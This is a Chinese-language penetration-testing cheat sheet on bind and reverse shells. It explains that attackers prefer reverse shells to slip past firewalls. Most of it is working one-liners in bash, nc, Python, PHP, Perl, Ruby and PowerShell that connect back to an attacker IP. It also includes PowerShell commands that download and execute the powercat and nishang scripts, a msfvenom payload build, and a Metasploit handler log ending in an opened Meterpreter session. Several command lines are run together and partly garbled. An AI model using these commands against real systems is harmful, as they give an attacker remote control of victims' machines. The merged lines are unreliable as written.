正向shell和反向shell
正向shell:控制端主动发起连接去连接被控制端
反向shell:被控制端主动连接控制端
在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败,
比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。
反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。
反向shell如下
Linux常见反向shell
bash反弹shell
nc -lvp 4444 bash -i>& /dev/tcp/192.168.11.12/4444 0>&1
nc反弹shell
nc -lvp 4444 nc 192.168.11.12 666 /bin/bash |nc 192.168.11.12 666 nc 192.168.11.12 999 -e /bin/bash Linux
python反弹shell
nc -lvp 9999
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.12",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP反弹shell
nc -lvp 6666
php -r '$sock=fsockopen("192.168.11.12",6666);exec("/bin/sh -i <&3 >&3 2>&3");'
Perl反弹shell
perl -e 'use Socket; $i="192.168.11.12";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
ruby反弹shell
nc -lvp 4444
ruby -rsocket -e'f=TCPSocket.open("192.168.11.12",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Windows反弹shell如下
powercat反弹shell
powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,
nc -vlp 6666
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.11.12 -p 6666 -e cmd
nishang反弹shell
Nishang(https://github.com/samratashok/nishang )是一个基于PowerShell的攻击框架,
集合了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。
nc -lvp 6666
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.11.12 -port 6666
自定义powershell函数反弹shell
nc -lvp 6666
powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('192.168.11.12',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
正向shell如下
nc 正向shell
nc -lvp 8080 -e /bin/bash nc 192.168.11.11 8080
msf木马正向shell
msfvenom -p windows/meterpreter/bind_tcp -f exe LPORT=80 -o shell.exe msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf6 exploit(multi/handler) > set lport 80 lport => 80 msf6 exploit(multi/handler) > set rhost 192.168.1.108 rhost => 192.168.1.108 msf6 exploit(multi/handler) > run [*] Started bind TCP handler against 192.168.1.108:80 [*] Sending stage (175174 bytes) to 192.168.1.108 [*] Meterpreter session 1 opened (192.168.11.12:33071 -> 192.168.1.108:80 ) at 2022-02-01 20:28:13 +0800 meterpreter > msf,payload模块 set payload windows/meterpreter/bind_tcp 正向 set payload windows/x64/meterpreter/reverse_tcp 反向
